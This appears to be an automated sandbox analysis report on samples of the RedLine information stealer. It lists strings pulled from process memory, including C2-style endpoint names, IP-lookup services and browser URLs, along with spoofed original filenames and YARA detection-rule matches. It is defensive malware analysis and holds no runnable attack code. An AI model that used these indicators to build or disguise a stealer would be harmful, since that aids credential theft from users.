                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: WltfeVzR.exe, 00000010.00000002.2316651532.000000000312B000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003291000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2316651532.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: tfF3UBTdr8.exe, tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WltfeVzR.exe, 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: tfF3UBTdr8.exe, WltfeVzR.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2218656941.0000000004417000.00000004.00000800.00020000.00000000.sdmp, WltfeVzR.exe, 00000010.00000002.2323282450.0000000003D4A000.00000004.00000800.00020000.00000000.sdmp, tmp100C.tmp.9.dr, tmp363B.tmp.16.dr, tmpFE2E.tmp.16.dr, tmp474E.tmp.9.dr, tmpFE0D.tmp.16.dr, tmpFEC.tmp.9.dr, tmpFE4E.tmp.16.dr, tmp102D.tmp.9.dr, tmp472C.tmp.9.dr, tmp478E.tmp.9.dr, tmp363C.tmp.16.dr, tmpC5D5.tmp.16.dr, tmp7E32.tmp.9.dr, tmp7E21.tmp.9.dr, tmp360A.tmp.16.dr, tmp102C.tmp.9.dr, tmp35F9.tmp.16.dr, tmp361A.tmp.16.dr, tmp472D.tmp.9.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 1492, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: WltfeVzR.exe PID: 1868, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: tfF3UBTdr8.exeStatic PE information: invalid certificate
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2101318526.0000000005C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2095978320.0000000003214000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2103451267.000000000A713000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBNiu.exe8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000000.2004506954.0000000000D02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBNiu.exe8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2091426104.000000000148E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000000.00000002.2102270609.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2209031817.0000000003322000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exe, 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exeBinary or memory string: OriginalFilenameBNiu.exe8 vs tfF3UBTdr8.exe
                    Source: tfF3UBTdr8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4159340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 9.2.tfF3UBTdr8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4141520.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4159340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.WltfeVzR.exe.4141520.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4228790.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.tfF3UBTdr8.exe.4210970.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000009.00000002.2204991581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2196920043.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2096396711.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: tfF3UBTdr8.exe PID: 6532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
